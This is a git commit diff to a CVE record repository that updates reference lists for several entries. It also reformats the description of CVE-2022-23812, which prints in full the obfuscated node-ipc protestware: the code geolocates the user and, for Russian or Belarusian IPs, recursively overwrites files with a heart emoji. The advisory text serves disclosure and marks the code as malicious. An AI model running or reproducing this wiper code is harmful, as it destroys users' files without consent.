"-Synchronized-Data."

2025-12-30 05:58:39 +00:00 · 2022-03-16 17:01:31 +00:00 · 2022-03-16 17:01:31 +00:00 · 6735647bb5
commit 6735647bb5
parent 644b5dd8ee
4 changed files with 44 additions and 16 deletions
--- a/2021/46xxx/CVE-2021-46699.json
+++ b/2021/46xxx/CVE-2021-46699.json
@ -56,6 +56,11 @@
                "refsource": "MISC",
                "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-949188.pdf",
                "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-949188.pdf"
+            },
+            {
+                "refsource": "MISC",
+                "name": "https://www.zerodayinitiative.com/advisories/ZDI-22-509/",
+                "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-509/"
            }
        ]
    }
--- a/2022/0xxx/CVE-2022-0997.json
+++ b/2022/0xxx/CVE-2022-0997.json
@ -0,0 +1,18 @@
+{
+    "data_type": "CVE",
+    "data_format": "MITRE",
+    "data_version": "4.0",
+    "CVE_data_meta": {
+        "ID": "CVE-2022-0997",
+        "ASSIGNER": "cve@mitre.org",
+        "STATE": "RESERVED"
+    },
+    "description": {
+        "description_data": [
+            {
+                "lang": "eng",
+                "value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
+            }
+        ]
+    }
+}
--- a/2022/23xxx/CVE-2022-23812.json
+++ b/2022/23xxx/CVE-2022-23812.json
@ -52,24 +52,29 @@
    "references": {
        "reference_data": [
            {
-                "refsource": "CONFIRM",
-                "url": "https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370"
+                "refsource": "MISC",
+                "url": "https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370",
+                "name": "https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://github.com/RIAEvangelist/node-ipc/issues/236"
+                "refsource": "MISC",
+                "url": "https://github.com/RIAEvangelist/node-ipc/issues/236",
+                "name": "https://github.com/RIAEvangelist/node-ipc/issues/236"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://github.com/RIAEvangelist/node-ipc/issues/233"
+                "refsource": "MISC",
+                "url": "https://github.com/RIAEvangelist/node-ipc/issues/233",
+                "name": "https://github.com/RIAEvangelist/node-ipc/issues/233"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js"
+                "refsource": "MISC",
+                "url": "https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js",
+                "name": "https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js"
            },
            {
-                "refsource": "CONFIRM",
-                "url": "https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580"
+                "refsource": "MISC",
+                "url": "https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580",
+                "name": "https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580"
            }
        ]
    },
@ -77,7 +82,7 @@
        "description_data": [
            {
                "lang": "eng",
-                "value": "This affects the package node-ipc from 10.1.1 and before 10.1.3.\n This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji.\r\n\r\n**Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.\r\n\r\n Malicious Code:\r\n\r\n**Note:** Don't run it!\r\n\r\njs\r\nimport u from \"path\";\r\nimport a from \"fs\";\r\nimport o from \"https\";\r\nsetTimeout(function () {\r\n    const t = Math.round(Math.random() * 4);\r\n    if (t > 1) {\r\n        return;\r\n    }\r\n    const n = Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=\", \"base64\"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154\r\n    o.get(n.toString(\"utf8\"), function (t) {\r\n        t.on(\"data\", function (t) {\r\n            const n = Buffer.from(\"Li8=\", \"base64\");\r\n            const o = Buffer.from(\"Li4v\", \"base64\");\r\n            const r = Buffer.from(\"Li4vLi4v\", \"base64\");\r\n            const f = Buffer.from(\"Lw==\", \"base64\");\r\n            const c = Buffer.from(\"Y291bnRyeV9uYW1l\", \"base64\");\r\n            const e = Buffer.from(\"cnVzc2lh\", \"base64\");\r\n            const i = Buffer.from(\"YmVsYXJ1cw==\", \"base64\");\r\n            try {\r\n                const s = JSON.parse(t.toString(\"utf8\"));\r\n                const u = s[c.toString(\"utf8\")].toLowerCase();\r\n                const a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\")); // checks if country is Russia or Belarus\r\n                if (a) {\r\n                    h(n.toString(\"utf8\"));\r\n                    h(o.toString(\"utf8\"));\r\n                    h(r.toString(\"utf8\"));\r\n                    h(f.toString(\"utf8\"));\r\n                }\r\n            } catch (t) {}\r\n        });\r\n    });\r\n}, Math.ceil(Math.random() * 1e3));\r\nasync function h(n = \"\", o = \"\") {\r\n    if (!a.existsSync(n)) {\r\n        return;\r\n    }\r\n    let r = [];\r\n    try {\r\n        r = a.readdirSync(n);\r\n    } catch (t) {}\r\n    const f = [];\r\n    const c = Buffer.from(\"4p2k77iP\", \"base64\");\r\n    for (var e = 0; e < r.length; e++) {\r\n        const i = u.join(n, r[e]);\r\n        let t = null;\r\n        try {\r\n            t = a.lstatSync(i);\r\n        } catch (t) {\r\n            continue;\r\n        }\r\n        if (t.isDirectory()) {\r\n            const s = h(i, o);\r\n            s.length > 0 ? f.push(...s) : null;\r\n        } else if (i.indexOf(o) >= 0) {\r\n            try {\r\n                a.writeFile(i, c.toString(\"utf8\"), function () {}); // overwrites file with \u2764\ufe0f\r\n            } catch (t) {}\r\n        }\r\n    }\r\n    return f;\r\n}\r\nconst ssl = true;\r\nexport { ssl as default, ssl };\r\n\n"
+                "value": "This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from \"path\"; import a from \"fs\"; import o from \"https\"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=\", \"base64\"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(\"utf8\"), function (t) { t.on(\"data\", function (t) { const n = Buffer.from(\"Li8=\", \"base64\"); const o = Buffer.from(\"Li4v\", \"base64\"); const r = Buffer.from(\"Li4vLi4v\", \"base64\"); const f = Buffer.from(\"Lw==\", \"base64\"); const c = Buffer.from(\"Y291bnRyeV9uYW1l\", \"base64\"); const e = Buffer.from(\"cnVzc2lh\", \"base64\"); const i = Buffer.from(\"YmVsYXJ1cw==\", \"base64\"); try { const s = JSON.parse(t.toString(\"utf8\")); const u = s[c.toString(\"utf8\")].toLowerCase(); const a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\")); // checks if country is Russia or Belarus if (a) { h(n.toString(\"utf8\")); h(o.toString(\"utf8\")); h(r.toString(\"utf8\")); h(f.toString(\"utf8\")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = \"\", o = \"\") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(\"4p2k77iP\", \"base64\"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(\"utf8\"), function () {}); // overwrites file with \u2764\ufe0f } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };"
            }
        ]
    },
--- a/2022/24xxx/CVE-2022-24729.json
+++ b/2022/24xxx/CVE-2022-24729.json
@ -69,15 +69,15 @@
    },
    "references": {
        "reference_data": [
-            {
-                "name": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-f6rf-9m92-x2hh",
-                "refsource": "CONFIRM",
-                "url": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-f6rf-9m92-x2hh"
-            },
            {
                "name": "https://ckeditor.com/cke4/release/CKEditor-4.18.0",
                "refsource": "MISC",
                "url": "https://ckeditor.com/cke4/release/CKEditor-4.18.0"
+            },
+            {
+                "name": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-f6rf-9m92-x2hh",
+                "refsource": "CONFIRM",
+                "url": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-f6rf-9m92-x2hh"
            }
        ]
    },